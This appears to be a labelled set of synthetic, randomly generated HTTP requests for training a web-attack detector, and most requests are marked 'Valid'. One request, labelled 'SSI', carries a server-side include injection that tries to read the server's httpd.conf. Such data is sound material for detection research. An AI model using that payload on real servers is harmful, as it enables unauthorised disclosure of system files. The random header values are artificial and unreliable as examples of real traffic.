UA-CPU: Sparc
UA-Disp: 738,354,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7753x3387
Via: 2.9 www.iocnxs.png
Transfer-Encoding: deflate
Upgrade: Hnpe3d/2.9, aor/1.2, Unn8/1.9, tgr5/3.9
Warning: 550 www.i2iee6oc.shtml "oSacwy8tbotbo3s3Oheu" 
X-Forwarded-For: 58.196.148.222
X-Serial-Number: 099160338549
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 21479
Start - Id: 3571
class: Valid
GET /oAj8gMemEN_G72Qb/tov4hGeAgg8/tisdw.kdzuGfqSC4Oj/rn06wsiheqtrdT/hn/wBsv.N6uMJQeObFSjJ/5ZuXrGvbscriptT8w/eypGdEYR/idX1vg3v5Y.Q/tesk8prbunrsesaan4y/es-Gvuh.asp?andGyTmetaeTfblogU=5&yme=h7btino+ksNRn5%40open%3DY&oOt=eypt&eiDo=953&arpeuhT=7Mtbh HTTP/1.1
Host: www.isp5tw.gov
Connection: keep-alive
Accept: video/quicktime, image/jpeg;q=0.3
Accept-Charset: cp-950, x-mac-cyrillic;q=0.7
Accept-Encoding: 
Accept-Language: ltf9ehqs-a;q=0.3
Cache-Control: max-stale
Client-ip: 143.147.25.230
Cookie: sgolc=5752;gusaetedaEphorx=2cetweaiax2c3leru
Cookie2: $Version="754"
Date: Wed, 12 Dec 07 06:18:10 UTC
ETag: W/"LvCaGWhAI1ubPMKHC"
Expect: ymirg=sGd2;oedel
From: gIwar@stneedoi.fr
If-Modified-Since: Sun, 09 Jan 05 17:27:14 UTC
If-Unmodified-Since: Mon, 15 Aug 05 06:25:02 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 5.8
Pragma: 0relhepo='e7gh1'
Proxy-Authorization: Basic b291ZGFvOjRFcmgzdGU=
Authorization: wgdpe iBen=Iili
Range: 285-321592,-0,1-98
Referer: http://www.5mvraAO.com/peeitd.png
TE: trailers,chunked
Trailer: Pragma
User-Agent: Mozilla/5.5 (Windows; U; Windows NT 8.0; iR-ie; rv:2.9.5) Gecko/99594307
UA-CPU: MIPS
UA-Disp: 754,026,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 047x6463
Via: HTTP/7.3 175.64.100.0
Transfer-Encoding: so5l; rmr3=rreol7
Upgrade: de4/4.9, rrhfau/6.1
Warning: 502 www.deutlFai.htm "sdoAadanidclexcd" "Sun, 24 Jan 10 15:55:45 CET"
X-Forwarded-For: 36.67.190.24
X-Serial-Number: 399935744
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3571
Start - Id: 21091
class: Valid
GET /sDdEi@dU7j1/fvCwemrTYIF@0XkyT/PO2zB/me5lo9exbadtoEocmpea/uodS1S.3cd6xpAz_/yVZ.css?sj=1ls&TtmHF=ydH&eu=1038100&tm4dtlne=7102725&aoT=231059637&sc=gd9&hs9B=A HTTP/1.1
Host: 147.126.235.208
Connection: close
Accept: application/*;q=0.4, application/*, application/postscript;q=0.5
Accept-Charset: iso-8859-6, iso-2022-kr, x-mac-greek, x-mac-greek
Accept-Encoding: *;q=0.1
Accept-Language: jegy-6sipvasb
Cache-Control: no-cache
Client-ip: 17.103.228.226
Cookie: f2scNodttjnrdth=477570;ihnrmi=1;gGLW=A&tmptttc=so;o3nt3s=9526;ei1ehQeetps=A tojm mk@b;sndhriijtwoce=s1X
Cookie2: $Version="133"
Date: Mon, 13 Nov 06 16:46:19 GMT
ETag: "BxkdHlN@ygGsqvdqlqi"
Expect: tNlt=exeet
From: aEswct3s@ehs9bieo.cz
If-Modified-Since: Sun, 18 Apr 04 04:22:51 CET
If-Unmodified-Since: Sun, 06 Sep 09 18:19:54 GMT
If-Match: *
If-None-Match: "SEqR4_kLU8e-eXD9Afw"
If-Range: *
Max-Forwards: 1
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: enm0uo sdtMua=n7u0triS
Authorization: Basic aGVlZWRyOnRhdWU=
Range: -552256,07267-
Referer: /oKetk.png
TE: chunked;q=0.4,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/8.0 (Windows; U; Win 9x 7.0; et-aA; rv:2.9.3) Gecko/77245689
UA-CPU: 68000
UA-Disp: 595,813,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 969x1839
Via: 8.7 www.unfto.png, 7.2 www.ezoo12s.shtml:2396
Transfer-Encoding: ninu
Upgrade: ochnm/4.8, 7fb2al/4.6, nnde/0.6, Oii67o/1.6, btqoia/9.7
Warning: 189 www.hycml3zs.png "rldecgpldeu7l" 
X-Forwarded-For: 133.50.37.166
X-Serial-Number: 46428205987
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21091
Start - Id: 20613
class: Valid
GET /eMRvnQpWMDJJ3aZT.dll?DrhnIRso=151336463 HTTP/1.1
Host: 242.95.234.9
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1258;q=0.2, x-mac-greek;q=0.1, windows-1258;q=0.1, gb2312
Accept-Encoding: *;q=0.6
Accept-Language: elt-tta;q=0.9
Cache-Control: only-if-cached
Client-ip: 157.227.130.51
Cookie: nhrbhhetzrOsE=21589450;mu0hih61iln2a=moUO;ofe=aa9esnsnexirwl1o5;Af5xt0=5;naeE1prdmlhTeks=dtewt-xespi 1oTh;rbedIne=eyrnB7TgBy
Cookie2: $Version="26"
Date: Tue, 23 Feb 10 18:40:55 UTC
ETag: W/"PtPYss6oLyCO0@yY8mJK"
Expect: 100-continue
From: aosan5@ntG2.uk
If-Modified-Since: Sun, 27 Sep 09 03:47:31 UTC
If-Unmodified-Since: Sat, 01 Sep 07 16:12:02 UTC
If-Match: "oyC1gB-D0Yl2rp4C0t7"
If-None-Match: *
If-Range: "sDP-f9vH0LO9fb7ZBrOW"
Max-Forwards: 0
MIME-Version: 0.4
Pragma: rftom='E8hnrc4i'
Proxy-Authorization: sRah gaho=eeosctBp
Authorization: NTLM MWlpbk5lcmlsSTJkTm9lRWxpZWwyZVBOZndlYmVBdHZhM3N1MmVUcWljNQ==
Range: 8188-
Referer: /erbtUavs.jsp
TE: trailers,trailers
Trailer: Connection
User-Agent: uagyices3b (aRP-CtoM; tTQmfTW0Hu; tylMs0C)
UA-CPU: StrongARM
UA-Disp: 6133,0939,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 9357x868
Via: FTP/6.3 180.207.137.145, HTTP/7.3 137.98.107.236, HTTP/7.4 www.8w3oixo.png:320
Transfer-Encoding: identity
Upgrade: eslgr/3.9, atMiHe/6.8, nTh/6.8, osoe/5.2, mniXaq/1.3
Warning: 109 117.179.223.232 "ovshoasge8M74ud09jmt" "Fri, 02 Apr 04 09:01:30 UTC"
X-Forwarded-For: 253.194.175.71
X-Serial-Number: 999844116491308
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 20613
Start - Id: 7188
class: Valid
POST /ePxHa2sjyCYzvr.aspx? HTTP/1.1
Content-Length: 139
Content-Language: zor
Content-Encoding: gzip
Content-Location: http://gEhine.cz/ibheaZs.js
Content-MD5: dGdldHFpeUhwZWl5UmplZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Aug 04 01:43:03 CET
Last-Modified: Sat, 18 Nov 06 09:55:13 CET
Host: www.oiiee.org
Connection: close
Accept: image/*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: 1sogRail-jteq, aeeIk-f
Cache-Control: rkqr1wr7='riR'
Client-ip: 3.86.121.179
Cookie: Li0iIldesir=y;v2dsudagtiKt=between%re(~foy a;nyWi=9802737
Cookie2: $Version="2"
Date: Sat, 07 Feb 04 11:33:25 UTC
ETag: W/"Sh3yDPz9_yECZK34u"
Expect: 100-continue
From: rnaa5sa6@a60sretsto.org
If-Modified-Since: Mon, 14 Aug 06 23:50:14 CET
If-Unmodified-Since: Sun, 29 Mar 09 10:08:55 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 21 May 05 09:35:25 UTC
Max-Forwards: 99
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest nc=9f15Ac7e
Authorization: Digest realm
Range: 975551-,9376-71358
Referer: http://www.Nsrb.it/0metnmdn/ri6baNE/ewde0m6s.pdf
TE: trailers
Trailer: Proxy-Authorization
User-Agent: odhceetl3/1.6.4.5
UA-CPU: MIPS
UA-Disp: 337,1594,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 7035x878
Via: 0.1 14.31.240.76:7, FTP/1.0 102.129.185.69
Transfer-Encoding: gzip
Upgrade: rfi/3.0, dIn/9.0, Hsdn/2.1
Warning: 892 www.oeiareeu.shtml "skEl0E" "Sun, 11 Jul 04 16:54:27 UTC"
X-Forwarded-For: 113.209.161.140
X-Serial-Number: 988104571
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tet5dtse=gorleobrHanni&tlhG154i=lti9is3E de3a n&b8pc=xic?&aoh=u3Q1XjLN-d5M&hZJOVo8_Ni9r=aEooyeinscwi%ul&cF8ElPgiirvbs8n=sc2<echo\gf

End - Id: 7188
Start - Id: 10345
class: Valid
GET /tsdssbi3trilehELy/aSuFR_/eQcbPEvYX.2/azj_oQ_VGrVZ.php4?iw31kS=0it%40hnte5&n2ohlroeD=itahuhbu9tsep&so=5ealIn%2B6io+&jtty=3in&7BDrPL=R6vp%2B&Z.0rK=mghd%5CxehttpiaS+rm&Tot=++ArL&8msamZVvwlinkBr=hDvF HTTP/1.0
Host: 42.26.96.102
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-2022-jp;q=0.7, x-mac-arabic;q=0.5, big5, iso-8859-9;q=0.4, x-mac-arabic;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=73
Client-ip: 219.140.164.41
Cookie: sts5ncrieeIb=a9vnr vd@
Cookie2: $Version="66"
Date: Tue, 02 May 06 24:48:17 UTC
ETag: "ZgWQTPE9_DTxzCl"
Expect: 100-continue
From: foniz@txtCtS.de
If-Modified-Since: Fri, 20 Nov 09 10:39:17 CET
If-Unmodified-Since: Fri, 29 Feb 08 24:22:40 UTC
If-Match: *
If-None-Match: "L3cPRQvfgRZ6SXnBep"
If-Range: Mon, 02 Feb 04 21:00:44 CET
Max-Forwards: 59
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: NTLM cnRjVEFycjZ0bmNucmxObmhhRUlsaW5idWFJdGl6ZWhuYmU5
Authorization: Digest nonce
Range: 9874-87885
Referer: http://www.5ii8.de/AEou2/vrran/ijenA4p/ezof/e9dkn.cgi
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/0.4 (X11; U; Solaris 7.3; ao-Oi; rv:8.6.8) Gecko/06943862
UA-CPU: PowerPC
UA-Disp: 2081,300,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7424x1666
Via: 1.5 214.193.131.121:9193, FTP/3.5 www.oNttswa.gif, FTP/2.9 www.9tzr.tiff
Transfer-Encoding: aXab; 1bSmtepQ=fithkAin
Upgrade: net/2.1
Warning: 078 www.povi.tiff "lsoNrm" "Mon, 05 Apr 04 01:58:32 UTC"
X-Forwarded-For: 180.232.254.90
X-Serial-Number: 780593
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10345
Start - Id: 34912
class: Valid
PUT /p@51gBQaO/h8-EgcC4zp1/Ezz7/67wAhBXGrkGeqi0/Z7cy_Ov/LbexecC_2KmetaX_1Tq/lB0m/iFwfP0_5rJ6kEI3.6/A2oocaLi/lboiaedaoaltiwxdotcd.asp? HTTP/1.0
Content-Length: 157
Content-Language: m,N4taai,cc
Content-Encoding: gzip
Content-Location: http://www.hpmqo8sa.it/6ocea/W5tts32n/moIviTi/Eon3kMug.gif
Content-MD5: Y21leHRpYmRmenRmdGVvbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Jun 05 19:25:19 UTC
Last-Modified: Sat, 07 Mar 09 13:43:53 CET
Host: www.aucsew.cz
Connection: c0of2ie
Accept: */*;q=0.8
Accept-Charset: iso-8859-3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 188.174.74.16
Cookie: sdli7acnofnr=eeiMiiU;e94osl76eirem=obsoe;do=:m
Cookie2: $Version="2"
Date: Tue, 13 Feb 07 22:09:20 CET
ETag: W/"2ZGVZ7-h9APwrNSm"
Expect: 100-continue
From: e6th@heetaerCl7.cz
If-Modified-Since: Sun, 06 Jan 08 11:47:40 GMT
If-Unmodified-Since: Mon, 28 Apr 08 16:40:29 CET
If-Match: "cKBTD1VRb9TK1Bw0e"
If-None-Match: "03aFeLVlHMB11sE1KS"
If-Range: Sat, 27 Oct 07 12:33:20 CET
Max-Forwards: 19
MIME-Version: 5.1
Pragma: eTodAe=tAU
Proxy-Authorization: Digest nc=72e2B70C
Authorization: Digest nonce
Range: 620-856266,09-5,0-
Referer: /tlCtd/cmnpnuo.png
TE: deflate
Trailer: Accept-Charset
User-Agent: pisetetmo/9.0.8
UA-CPU: x86
UA-Disp: 7242,197,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 4336x049
Via: xeeidk/5.7 158.116.246.189:3
Transfer-Encoding: fets
Upgrade: dpoRne/8.4, htoozh/1.3
Warning: 142 223.248.82.42 "ljqtgix0lgu1sa" 
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 5563045665
----: ---------------
~~~~~: ~~~~~~~~~~~~~

iidrnat=ewutyr&tdqScDe=97552802&fromrPQMamyZwherej=gwldephtit6&4eiNrhordf=Ebhr%aT+betweenel%&AnteiomaLhN=atctsne2chi4st?&Yu7dez8pi=84857111&heeBlrt=5

End - Id: 34912
Start - Id: 27793
class: Valid
GET /rHHkMT6rW6xG7fVTiM/t1R/xxtermfxatCK@cetc/nsnniry/rhps1oHizier/nxi/upeilya/noqabH7trehEataeo/fl41va7LNNp7FHH8/9legsmf/dSpZ-MOlLI.aspx? HTTP/1.1
Host: www.instiu.com
Connection: close
Accept: application/*
Accept-Charset: x-mac-arabic;q=0.2, cp-950, windows-1252, cp-932;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 244.220.138.75
Cookie: lnodbietas=66edocumentkqrep45R;0vxdeleteNGoem=ynautoexecs;imofomkatiswDD9=1n4ksn;ennjrtta7aauhln=fhnsfWtt|;ntemAe=fined0mhetEYwdM
Cookie2: $Version="3"
Date: Sat, 20 Mar 10 05:36:30 GMT
ETag: "Wrf9b4HDRIA3AhajE6_"
Expect: 100-continue
From: omsc@oihc6.biz
If-Modified-Since: Thu, 09 Dec 04 21:51:23 CET
If-Unmodified-Since: Wed, 01 Aug 07 17:08:02 GMT
If-Match: *
If-None-Match: "ZnNYGzaA@rYdPrghAD7O"
If-Range: *
Max-Forwards: 8
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: mntnor HgotSst=Rpgnni
Authorization: nBe2uz boimn5f=y9rrsw
Range: -83593,-88
Referer: http://dfsoiwbu.uk/esaer3o/BEud0h/nes9/ei0tnara/oidlttSs.php3
TE: gzip
Trailer: TE
User-Agent: Mozilla/6.1 (compatible; MSIE 1.5; Unix; ygrsvet; 3sa16spk; sStdlsnkNn)
UA-CPU: x86
UA-Disp: 966,647,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 364x479
Via: HTTP/6.3 134.235.202.89, 8.5 www.w2oea.htm
Transfer-Encoding: gzip
Upgrade: 8oArj/0.3, elhh/1.2, 9oUsf/7.4, bib/0.3
Warning: 915 www.tluon.jpeg:326 "rrne4fWsouns" 
X-Forwarded-For: 90.82.25.41
X-Serial-Number: 00771445760189664084
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27793
Start - Id: 14724
class: Valid
GET /d@_5YVNwbnq7uUyJ54/l0zfebtbtm0nto/fUUk5B10fCwDm.swf?gn9u3m2xfnkBE=4rtmrSd7eno&eaotwssyedj=h8saurodostdo4zH&Tatu=12&L5Qs9e=Os0tToqCneeUg&obHdrAfsnly=81&sprnnotapsmNuc=r%40lienlsqerSqC&mu1ocor=PzJpmgnafooeli HTTP/1.1
Host: 240.148.184.168
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: ygho-naeW9, c8a-yrta, e-qee;q=0.8, g-w, o-eEyeictc
Cache-Control: c7='niL'
Client-ip: 157.235.60.81
Cookie: tenhnie3=ehi ede&a ictvkc;oersncpfehdTec=dXuodIa5szreaD0its;Royearr9sp=7614244;nuennyysbnnrr=ofeKcge1itee
Cookie2: $Version="95"
Date: Wed, 09 May 07 01:15:55 UTC
ETag: W/"8iKARhV_-bG5ME1f0mMF"
Expect: 100-continue
From: nDone@1pntglpR.cz
If-Modified-Since: Wed, 12 Aug 09 21:05:29 UTC
If-Unmodified-Since: Wed, 27 Dec 06 10:21:04 UTC
If-Match: *
If-None-Match: "N36KtPwnF.j-Q639"
If-Range: "UrONabl_8p2Z4kO8vgx"
Max-Forwards: 50
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest uri=http://tett.ch/tulLjgt.swf
Authorization: NTLM c2E1emVjaDlNZWFybG1lYWJFc2lINWhjUlRyZXJ0YzI5cmJl
Range: 07-
Referer: /arnE/owop/eLoeqNk/dhyrhda/teloi.swf
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/5.5 (Machintosh; U; Mac OS X 4.8; nj-ls; rv:7.5.6) Gecko/48318865
UA-CPU: x86
UA-Disp: 733,9202,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 887x095
Via: 6.6 63.18.20.86
Transfer-Encoding: winqaa
Upgrade: wka/5.4, itcal/5.7
Warning: 713 252.70.82.253 "8Dthiti" 
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 5935364150091795
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14724
Start - Id: 12413
class: Valid
GET /ifp/gsgawsacp/hJNfQK0sdlOUKn/witt5acamv/z8fete0abar7buo.mspx?m1mrnp=1444704068&E23EwgetFsock_stream=468 HTTP/1.0
Host: 38.224.176.12:29
Connection: keep-alive
Accept: video/quicktime;q=0.5, audio/x-wav, image/png
Accept-Charset: *
Accept-Encoding: *
Accept-Language: rstna-cv2Srdns;q=0.1, oo-sS;q=0.9
Cache-Control: only-if-cached
Client-ip: 133.200.48.246
Cookie: JcCF1=9;lrA2treeyrngto=s;zmedaimh8J=53574668;md=078;eJew=278
Cookie2: $Version="23"
Date: Wed, 05 Dec 07 16:57:12 UTC
ETag: W/"bwj.1qI6pKy-i7GX"
Expect: 100-continue
From: yiBv9i@mndhmfHee.st
If-Modified-Since: Fri, 27 Jul 07 10:17:04 CET
If-Unmodified-Since: Tue, 10 Aug 04 04:07:56 GMT
If-Match: *
If-None-Match: "P@OZ5pCL2w_7yl-j"
If-Range: Wed, 14 Jan 04 16:37:13 CET
Max-Forwards: 9165
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: feoulm Ptecse1=aOIsge
Authorization: NTLM ZHBscnRlZW9uZ3RLclNoaXNFMGxhZGVvanRodWVzZlRua3JlYw==
Range: 345-,-6,98-2183
Referer: /ftwh6ynn/ttrn.jpg
TE: trailers,chunked;q=0.6,deflate
Trailer: Host
User-Agent: jtBs (gnrd-q)
UA-CPU: PowerPC
UA-Disp: 8747,794,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7091x4892
Via: HTTP/6.6 97.106.241.240, 0.2 150.50.8.128
Transfer-Encoding: deflate
Upgrade: neuch/5.4
Warning: 287 176.2.7.94 "enesescISnojte" 
X-Forwarded-For: 197.61.217.27
X-Serial-Number: 200058201
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12413
Start - Id: 21110
class: Valid
GET /Z5xK2HoVW7T/XmT_G/yGI4PXDrgG/saci/iO3lzclgtonmeufT/q@-QXR9xfJ0Ms/esslhy7whettmnflvze/97ne2cRn/lgh0lt0wub4xwuewsuut/ueV87T0a@FCt/NocthAsnero4afemd.asmx?oziebthI=7&k4hhatAnoe6x=nYktdp4r&eylnxrxelifaai=meribr&qttw=i+d&enlvzo8ix=586706224&ss3jn0t=et3ecAN9asl&ntie1oycnearo=8654&uB.p=acbK&TRQCYW6mfhome=0270&3hnTii6twc=3 HTTP/1.1
Host: 179.5.30.20
Connection: pcna
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 42.92.167.68
Cookie: Nth7hx=s6t;DdU7uDjf41n=m4Uscript@w0ce]7c0em
Cookie2: $Version="340"
Date: Fri, 01 May 09 17:17:36 GMT
ETag: "bEGyFS.RFNQ4ovS471"
Expect: ti8wt
From: esr8neue@emIt.biz
If-Modified-Since: Mon, 20 Aug 07 10:37:00 CET
If-Unmodified-Since: Fri, 13 Aug 04 24:08:39 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 58
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: nath o2h1E=5lEosz
Authorization: wlue poihH=xeCi3
Range: 92569-9
Referer: http://www.r8wet.com/aceri9/iygwwEs/jLaottp/crcpa4t.txt
TE: gzip;q=0.5,chunked,chunked
Trailer: Via
User-Agent: Mozilla/7.2 (compatible; MSIE 9.5; Windows NT; AswuTs1et)
UA-CPU: x86
UA-Disp: 595,813,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 969x1839
Via: qoee/4.9 34.34.208.188, FTP/9.8 www.nnfae.tiff:843
Transfer-Encoding: yrdbe; aoSiD=eNkf
Upgrade: nwr/6.8, eak/9.5, 9dej/0.9, urA/5.8, ecpeiw/5.4
Warning: 570 www.taeab.tiff "TioA2dutNoOmxe" 
X-Forwarded-For: 133.50.37.166
X-Serial-Number: 0274722
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21110
Start - Id: 39579
class: SSI
POST /FAO.connectrnnFDeNVc/e3IMiUXT34CAuy0j/QdKHQNdzOd/te/pr5/RATftpCqwbM@gc/aiUldluC.asp? HTTP/1.0
Content-Length: 79
Content-Language: zB
Content-Encoding: gzip
Content-MD5: NXNvcnBteHRrMGFpbWc3OA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 16 May 08 23:14:59 CET
Host: 174.202.186.133
Connection: close
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.8
Accept-Encoding: compress, gzip, deflate;q=0.1, identity
Cache-Control: max-age=1257
Cookie: xinl=@adminfssama?;koVincludeimg6styleQ=tue?;TbinGQR7Xg=jafff0secase9;foe=3;MXC@h=6s6mailaid
Date: Fri, 22 May 09 10:12:10 GMT
ETag: W/"acVHAgOu9a8kq4w51"
Expect: 100-continue
If-Unmodified-Since: Fri, 16 Jan 04 22:15:54 UTC
If-Match: *
If-None-Match: *
If-Range: "5e_7Esin9fB1xG5I4ncZ"
Max-Forwards: 7082
Referer: http://tdks.ch/keaozieh.nsf
TE: gzip
User-Agent: Mozilla/1.8 (compatible; MSIE 9.9; Linux i586; feAatuh; rmnhctel)
Via: HTTP/6.8 www.Z7dSd.gif, 2.2 3.84.135.203
X-Forwarded-For: 164.198.118.70

vA=<!--    #include    virtual="/etc/httpd/httpd.conf"  -->

End - Id: 39579
Start - Id: 16151
class: Valid
GET /w9RKf3HJbA.jpg?oaobC=gFo&nt6=580&netcatpTsAU=7661481693 HTTP/1.1
Host: 246.102.248.251
Connection: jmr0ri
Accept: */*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: osydcrge-d;q=0.5
Cache-Control: max-age=7
Client-ip: 184.141.137.190
Cookie: a0=vh;pEzLyulh=i.6G3ETS5;2otterhphl=gxp_@/r
Cookie2: $Version="550"
Date: Mon, 27 Aug 07 16:13:58 CET
ETag: W/"5GqYSV1L-MHzvD_"
Expect: dasaoNn
From: nt6y@jrn3wp.st
If-Modified-Since: Fri, 13 Jul 07 11:26:59 CET
If-Unmodified-Since: Thu, 02 Nov 06 21:32:25 GMT
If-Match: *
If-None-Match: "TtWDawbD17gVEiQ.e6"
If-Range: "Y8t1AV@mDEap4n9A1"
Max-Forwards: 854
MIME-Version: 9.3
Pragma: iya68r='if'
Proxy-Authorization: sphtg rtywtf=ahe28
Authorization: NTLM YWF0d3M2YnJvaHVOd3NuSHQwcmFlblRuYTBvSXlON2hl
Range: -122,6-31617,8935-
Referer: http://www.acdrtM.net/sitd5o/aceeCl4/o6po3u.exe
TE: trailers,trailers
Trailer: Authorization
User-Agent: cmgtlnipuh
UA-CPU: StrongARM
UA-Disp: 6343,6602,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 846x8936
Via: HTTP/5.0 49.180.186.178, 9.5 www.torzma.htm, HTTP/9.5 www.et8esD.js
Transfer-Encoding: hwhhba; hrpo9=watnuz
Upgrade: c7s/6.3, sdds/1.7, hGed/6.3, sda/9.3
Warning: 819 www.htahn.html "47kuswi" "Thu, 19 May 05 07:26:39 UTC"
X-Forwarded-For: 137.131.109.193
X-Serial-Number: 170443509058668191
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 16151
Start - Id: 13843
class: Valid
GET /ecrsabh5oPgb4a/erinnissteox3Eto6/execECtmp/z53PY9sFs7/ft9aic3ptxssatd.jpeg? HTTP/1.0
Host: 228.254.239.170:80
Connection: oe5tsb
Accept: */*
Accept-Charset: euc-cn;q=0.7, x-mac-chinesesimp;q=0.4, cp-932;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: mi1=s
Client-ip: 145.167.33.139
Cookie: MnuGaBJivwhereM=liketelnet7Er;ilrn=9897;sssiedo=n2ma1oenrqbe;gmre=6lie;renc3eCr=u:teg8ss2e;hn9pho=e2K_gEc
Cookie2: $Version="8"
Date: Fri, 02 Apr 10 16:17:12 CET
ETag: "w8wGjCCblnDz6k3nImk"
Expect: Sblat7=eync
From: icse@bldetb.uk
If-Modified-Since: Thu, 06 Sep 07 13:44:47 CET
If-Unmodified-Since: Thu, 13 Oct 05 07:51:42 GMT
If-Match: *
If-None-Match: *
If-Range: "EQXgd_9cnkysFz9SxM"
Max-Forwards: 9756
MIME-Version: 2.3
Pragma: tmT=umszodl
Proxy-Authorization: Basic bDBjbm50Om5BbW96dA==
Authorization: Basic aGFlbjphOFcx
Range: 691739-,100150-
Referer: /dtehanAc/eaeniuic/slQ7/balP/iTstsi.wmn
TE: deflate;q=0.3,chunked;q=0.5
Trailer: Authorization
User-Agent: mo8hrmeoe/5.1.2.3.9
UA-CPU: MIPS
UA-Disp: 4060,2972,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 750x449
Via: HTTP/8.6 www.rnnhgc.gif:22271, FTP/1.3 www.rrnN.jpg
Transfer-Encoding: compress
Upgrade: eqp/4.6, eiffm/7.0
Warning: 272 www.ss2emoow.tiff "poeyaiei1gtltn" 
X-Forwarded-For: 182.32.87.239
X-Serial-Number: 2424153746137739
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 13843
Start - Id: 7503
class: Valid
POST /ura40iTnptirtrfeesu/tmpU/tIeiE/kcEP3adaogsns/catCXX2tEyifNd.msf? HTTP/1.0
Content-Length: 112
Content-Language: t
Content-Encoding: deflate
Content-Location: /t28nRshf.rar
Content-MD5: cG1uamhzdHR3bmVucnNvYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Dec 04 08:49:25 UTC
Last-Modified: Sun, 13 Nov 05 17:13:43 CET
Host: 174.237.35.250:5
Connection: keep-alive
Accept: image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 161.58.198.141
Cookie: wl3be=bsa8
Cookie2: $Version="4"
Date: Wed, 30 Mar 05 07:20:42 CET
ETag: W/"5mVNCS.B9OlPiMZIhNQT"
Expect: 100-continue
From: nx7o@olnt1.uk
If-Modified-Since: Tue, 05 Oct 04 13:39:22 GMT
If-Unmodified-Since: Sat, 27 Dec 08 18:19:12 CET
If-Match: *
If-None-Match: "Q2OXbyL97stzc5euV"
If-Range: Sun, 16 May 04 02:22:08 UTC
Max-Forwards: 7320
MIME-Version: 7.9
Pragma: hoa='yt'
Proxy-Authorization: Digest nc=ae0bFDd6
Authorization: Digest nc=3EabeFfb
Range: -8172
Referer: /nttee.htm
TE: chunked;q=0.2
Trailer: If-None-Match
User-Agent: vtxoneou6emdusmcato
UA-CPU: MIPS
UA-Disp: 4017,6215,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 065x199
Via: 4.3 234.213.232.62, 8.1 www.eis2.shtml
Transfer-Encoding: deflate
Upgrade: re0dg/7.1
Warning: 710 www.0nr9ps.tiff "rhdtOmautr8t" 
X-Forwarded-For: 192.154.138.206
X-Serial-Number: 0836554
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

thripcsOvwko=5636778955&ct=eqeekry1bior&ape=$edor3:nm&rO6uuEErn=rr7b3dY&WIPVk9Adelete=hne&rnodte=wkbCxy.ASLF

End - Id: 7503
Start - Id: 26105
class: Valid
